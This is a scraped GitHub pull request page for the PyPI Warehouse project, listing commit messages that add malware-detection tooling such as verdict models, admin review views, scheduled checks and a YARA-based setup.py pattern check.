Tooling for automated detection of malware #7377

ewdurbin · 2020-02-11T19:52:54Z

Design and implementation work by @xmunoz, example checks by @woodruffw.

* Add new models for malware detection. Fixes #7090 and #7092. * Code review changes. - FK on release_file.id field instead of md5 - Change message type from String to Text - Change Enum class in model to singular form

* Add admin interface to view and enable checks - Implement list, detail and change_state views (#7133) - Add unit tests for check admin view * Add comprehensive test coverage for check admin

* Add initial hook-based check execution mechanism * scratch/poc * Add initial hook-based check execution mechanism * Use sqlalchemy event hooks for malware checks * Fix unit tests * Add enum for MalwareCheckObjectType * Add unit tests for init. * Add tests for tasks, services, and utils. Also, some small bugfixes in MalwareCheckFactory and the get_enabled_checks method. * Fix spurious task test. * Add missing drop enum to downgrade function. * Added TODO to dev/environment * Be more explicit in check lookup Co-authored-by: Ernest W. Durbin III <ewdurbin@gmail.com>

* Add malware check syncing mechanism * Code review changes.

* Refactor MalwareCheckBase. Fixes #7091. Add Foreign Keys in MalwareVerdicts for other types of objects (Releases, Projects). * Change verdict dict to kwargs.

* Add wipe-out functionality Related: #7133 * Call list explicitly

* Add rudimentary verdicts view. Progress on #6062. Also, add some better testing logic for wiped_out condition. * Code review changes. - Conditionally show fields that are populated - JSON pretty formatting * Fix unit test bug. - Use `get` instead of `filter` to look up verdict by pkey. * simplify unit tests for verdicts view

* introduce malware queue * correct syntax, apparently list of tuples documented doesn't work.

* Add backfill functionality to check admin #7094 - Add backfill task - Change lookup of checks to check_name instead of id - Load checks that are also in "evaluation" state * Add unit tests for backfill. - Log number of runs executed by backfill - Perform basic validation on sample_rate input - Clean up other testing logic. * Remove superfluous 'all()' * Code review changes. - Set backfill size to a fix number, not configurable via web ui. - Backfill task enqueues run_check tasks - Only retry if `check.run` fails, not if loading the check fails. - Use exponential backoff for retries. * Update warehouse/admin/templates/admin/malware/checks/detail.html Co-Authored-By: Ernest W. Durbin III <ewdurbin@gmail.com> Co-authored-by: Ernest W. Durbin III <ewdurbin@gmail.com>

- Add `schedule` field to MalwareCheck model #7096 - Move ExampleCheck into tests/common/ to remove test dependency from prod code - Rename functions and classes to differentiate between "hooked" and "scheduled" checks

* requirements: Introduce yara * [WIP] malware/check: SetupPatternCheck In progress. Introduces SetupPatternCheck, an implementation of an event-based check that scans the `setup.py`s of release files for suspicious patterns. * malware/checks: Give MalwareCheckBase.run/scan args, kwargs * malware: Add check preparation Fiddle with the check/run signature a bit more. * malware/checks: Unpack file path correctly * docker-compose: Override FILES_BACKEND for worker The worker needs to be able to see the "files" virtual host during development so that malware checks can fetch their underlying release files. * [WIP] malware/checks: setup.py extraction * malware/checks: setup_patterns: Fix enum, seek * malware/checks: setup_patterns: Apply YARA rules Each rule match becomes a verdict. * malware/checks: setup_patterns: Prefer get over filter * warehouse/{admin,malware}: Consistent enum names Also enforce uniqueness for enum values. * warehouse/{admin,malware}: More enum changes * tests: Update admin, malware tests * tests: Fix enum, more test fixes * tests: Add prepare tests * malware/changes: base: Unpack id correctly * tests: Begin adding SetupPatternCheck tests * malware/checks: setup_patterns: Fix enum * tests: More SetupPatternCheck tests * warehouse/malware: setup_patterns: Fix enums * tests: More SetupPatternCheck tests * tests: Add license header * malware/checks: setup_patterns: Add TODO * tests: More SetupPatternCheck tests * tests: More SetupPatternCheck tests * tests: Complete extraction tests for SetupPatternCheck * tests: Fix test * malware/checks: Add docstring for prepare * malware/checks: blacken * malware/checks: Document, expand YARA rules * tests, warehouse: Restructure utilities * malware: Order some enums, reduce SetupPatternCheck verdicts * malware/models: Add missing __lt__ * malware/checks: Always embed the model object in the prepared arguments Use it instead of performing a DB request in the check itself. * malware/checks: Avoid raw bytes * malware/changes: Remove unused import * tests: Fixup malware tests * warehouse/malware: blacken * tests: Fill in malware coverage * tests, warehouse: Add a benign verdict for SetupPatternCheck * tests: blacken

* Implement scheduled checks #7093 - Rename `run_backfill` to `run_evaluation` in admin malware view - Modify `run` and `scan` method signatures to accept `**kwargs` - Extend `run_check` to accomodate scheduled check functionality * Reduce unit test flakiness * Code review changes. Also replace `check.hooked_object` with `check.hooked_object.value` in check detail template. * tests, warehouse: enum fixes * Fix lint error Co-authored-by: William Woodruff <william@yossarian.net>

* Add verdicts view filtering capabilities #6062. * Code review changes. - Refactor tests to be parametrized. - Pass `_query` to `route_path` in template. - Remove `is None` from filter query, it adds nothing.

* Add verdict administrator review. Fixes #6062. - Add new `admin.verdicts.review` endpoint - Change layout of verdict list and detail view and add forms - Change sort order of the MalwareChecks, and update the tests * Code review changes. - Rename MalwareVerdict field `administrator_verdict` to `reviewer_verdict`. - Change verdict review permission from `admin` to `moderator`.

* Misc cleanup and TODOs on malware checks. - Change backfill function to invoke `IMalwareCheckService` interface - Add support for `kwargs to `IMalwareCheckService` interface - Rename variable from reserved word `file` to `release_file` - Add `FatalCheckException` for non-retryable exceptions - Replace `MALWARE_CHECK_BACKEND` in dev/environment * Make `IMalwareService` the entrypoint for `run_check` - Add `run_scheduled_check` task that invokes this interface. - Remove useless utility method - Move `FatalCheckException` into warehouse/malware/errors.py.

* malware/checks: PackageTurnover skeleton * malware/checks: PackageTurnover: Add NOTE * malware/checks: PackageTurnoverCheck: more work * tests: blacken * malware/checks: More PackageTurnoverCheck work * malware/checks: Blacken * malware/checks: Blacken * package_turnover: Promote from indeterminate to threat * tests: Begin adding package_turnover tests * tests: Add remaining package_turnover tests * tests: Drop unused imports * warehouse: Drop (ww) from NOTE * checks/package_turnover: Drop NOTE

xmunoz mentioned this pull request Feb 11, 2020

Automated detection of malware: add documentation. Fixes #7095. #7369

Merged

di self-requested a review February 14, 2020 17:09

xmunoz and others added 16 commits February 18, 2020 15:07

Add new models for malware detection. (#7118)

b051793

* Add new models for malware detection. Fixes #7090 and #7092. * Code review changes. - FK on release_file.id field instead of md5 - Change message type from String to Text - Change Enum class in model to singular form

Add admin interface to view and enable checks (#7134)

ce21ebf

* Add admin interface to view and enable checks - Implement list, detail and change_state views (#7133) - Add unit tests for check admin view * Add comprehensive test coverage for check admin

Add malware check syncing mechanism (#7190)

7fd9964

* Add malware check syncing mechanism * Code review changes.

Refactor MalwareCheckBase. Fixes #7091. (#7196)

d4dbeed

* Refactor MalwareCheckBase. Fixes #7091. Add Foreign Keys in MalwareVerdicts for other types of objects (Releases, Projects). * Change verdict dict to kwargs.

Add wipe-out functionality (#7202)

046dbc1

* Add wipe-out functionality Related: #7133 * Call list explicitly

introduce malware queue (#7227)

a9572b9

* introduce malware queue * correct syntax, apparently list of tuples documented doesn't work.

Refactor testing logic #7098 (#7257)

16baaa7

- Add `schedule` field to MalwareCheck model #7096 - Move ExampleCheck into tests/common/ to remove test dependency from prod code - Rename functions and classes to differentiate between "hooked" and "scheduled" checks

Add verdicts view filtering capabilities #6062. (#7322)

6fe43a3

* Add verdicts view filtering capabilities #6062. * Code review changes. - Refactor tests to be parametrized. - Pass `_query` to `route_path` in template. - Remove `is None` from filter query, it adds nothing.

ewdurbin force-pushed the malware-detection branch from f3357b9 to f614bad Compare February 18, 2020 20:08

ewdurbin merged commit 557ca0e into master Feb 18, 2020

ewdurbin deleted the malware-detection branch February 18, 2020 23:06

This was referenced Feb 18, 2020

Detect malicious packages, for later removal #5117

Closed

Detect packages being published with typo'ish names #4998

Open

martintoreilly mentioned this pull request Jun 4, 2020

Process for adding python/R/Julia/Ubuntu/etc. packages alan-turing-institute/data-safe-haven#622

Closed

2 tasks

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Tooling for automated detection of malware #7377

Tooling for automated detection of malware #7377

ewdurbin commented Feb 11, 2020

Tooling for automated detection of malware #7377

Tooling for automated detection of malware #7377

Conversation

ewdurbin commented Feb 11, 2020